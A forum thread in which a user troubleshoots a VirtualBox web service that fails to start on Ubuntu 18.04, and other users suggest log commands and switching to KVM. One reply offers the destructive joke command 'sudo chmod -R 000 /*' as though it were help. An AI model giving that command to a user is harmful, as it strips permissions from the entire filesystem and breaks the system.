Unable to start VBox Web Service Ubuntu Server

Hi,

I am trying to install virtualBox on my Ubuntu server (18.04 LTS), though, when running

sudo systemctl restart vboxdrv

It will throw an error, specifically:

Sep 21 20:59:53 pegasus-server systemd[1]: Starting vboxweb-service.service...
Sep 21 20:59:53 pegasus-server vboxweb-service.sh[18931]: vboxweb-service.sh: Starting VirtualBox web service.
Sep 21 20:59:53 pegasus-server vboxweb-service.sh[18938]: Starting VirtualBox web service.
Sep 21 20:59:53 pegasus-server vboxweb-service.sh[18931]: vboxweb-service.sh: failed: VirtualBox web service failed to start.
Sep 21 20:59:53 pegasus-server vboxweb-service.sh[18953]: failed: VirtualBox web service failed to start.
Sep 21 20:59:53 pegasus-server systemd[1]: vboxweb-service.service: Control process exited, code=exited status=1
Sep 21 20:59:53 pegasus-server systemd[1]: vboxweb-service.service: Failed with result 'exit-code'.
Sep 21 20:59:53 pegasus-server systemd[1]: Failed to start vboxweb-service.service.

I havent been able to fix this, I hope someone here know how to.

Thanks ?

That doesn't tell us much, try running

journalctl -xe | grep vbox

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Like Sauron already said. + You might also want to post the output of the following commands here if it has any information.

dmesg | tail
systemctl --failed

Why use virtual box on ubuntu? KVM based solutions normally work much better in linux, and there are many good web gui's for them aswell. look at proxmox if you want a kvm based hypervisor.

The output of journalctl -xe | grep vbox: https://pastebin.com/sqPDSMia

output of dmesg | tail: https://pastebin.com/t7zSFcpv

output of systemctl --failed: ● pteroq.service          loaded failed failed Pterodactyl Queue Worker                                                                      
● vboxweb-service.service loaded failed failed vboxweb-service.service   

● pteroq.service          loaded failed failed Pterodactyl Queue Worker                                                                      
● vboxweb-service.service loaded failed failed vboxweb-service.service    

Thanks for the replies so far! :D

3 minutes ago, Electronics Wizardy said:

Why use virtual box on ubuntu? KVM based solutions normally work much better in linux, and there are many good web gui's for them aswell. look at proxmox if you want a kvm based hypervisor.

Because I only have one server available to me, running ubuntu, and it is possible, otherwhise VirtualBox wouldnt be available for Ubuntu :)

Just now, TheDutchMC04 said:

Because I only have one server available to me, running ubuntu, and it is possible, otherwhise VirtualBox wouldnt be available for Ubuntu :)

But kvm just works better normally on linux. Better support, more commonly used, better performance, more integrated into kernel. And its just a simple install with apt aswell.

1 minute ago, Electronics Wizardy said:

But kvm just works better normally on linux. Better support, more commonly used, better performance, more integrated into kernel. And its just a simple install with apt aswell.

I understand that, but this VM isnt here for performance, and it may be more common. But I would like to stick with Ubuntu, as stubborn as that may sound ?

Can read something in the log about vboxweb-service.sh failing to start. You might want to find this script and start it manually see what kind of output this will give.

find / -name vboxweb-service.sh
cd <Location of vboxweb-service.sh>
./vboxweb-service.sh

Edit : You might want to run that as sudo ;) otherwise many access denieds

Just now, TheDutchMC04 said:

I understand that, but this VM isnt here for performance, and it may be more common. But I would like to stick with Ubuntu, as stubborn as that may sound ?

but you can install kvm on ubuntu. Its a program just like virtual box, but better in most ways. Just install libvirt and qemu-kvm with apt

1 minute ago, Jarno. said:

Can read something in the log about vboxweb-service.sh failing to start. You might want to find this script and start it manually see what kind of output this will give.

find / -name vboxweb-service.sh
cd <Location of vboxweb-service.sh>
./vboxweb-service.sh

I found the file in /usr/lib/virtualbox, running ./vboxweb-service.sh start gives

vboxweb-service.sh: Starting VirtualBox web service.
vboxweb-service.sh: failed: VirtualBox web service failed to start.

1 minute ago, Electronics Wizardy said:

but you can install kvm on ubuntu. Its a program just like virtual box, but better in most ways. Just install libvirt and qemu-kvm with apt

Ahh gotcha! I thought it was a seperate OS. Ill give it a go then!

10 minutes ago, Electronics Wizardy said:

Totally agree to this, KVM has way less overhead then virtualbox and VMware workstation. Funny fact: imported some diskimages from vmware workstation into KVM the other day on the same Linux PC. And it was running way better.

2 minutes ago, Jarno. said:

Totally agree to this, KVM has way less overhead then virtualbox and VMware workstation. Funny fact: imported some diskimages from vmware workstation into KVM the other day on the same Linux PC. And it was running way better.

I will throw VB out the window then, and install KVM :D